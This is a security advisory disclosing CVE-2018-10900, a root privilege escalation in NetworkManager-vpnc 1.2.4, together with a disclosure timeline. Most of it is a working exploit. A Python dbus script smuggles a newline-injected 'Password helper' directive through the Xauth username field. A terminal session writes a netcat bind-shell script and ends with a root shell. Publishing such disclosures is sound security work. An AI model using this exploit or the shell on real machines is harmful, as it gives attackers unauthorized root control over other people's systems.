Network Manager VPNC 1.2.4 Privilege Escalation

Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018
CVE: CVE-2018-10900

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC a 1.2.4

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

import dbus
con = {
'vpn':{
'service-type':'org.freedesktop.NetworkManager.vpnc',
'data':{
'IKE DH Group':'dh2',
'IPSec ID':'testgroup',
'IPSec gateway':'gateway',
'IPSec secret-flags':'4',
'Local Port':'0',
'NAT Traversal Mode': 'natt',
'Perfect Forward Secrecy': 'server',
'Vendor': 'cisco',
'Xauth password-flags': '4',
'Xauth username': "username Password helper /tmp/test",
'ipsec-secret-type': 'unused',
'xauth-password-type': 'unused'
}
},
'connection':{
'type':'vpn',
'id':'vpnc_test',
},
'ipv4':{'method':'auto'},
'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME UUID TYPE DEVICE
Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3
vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+ Stopped nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz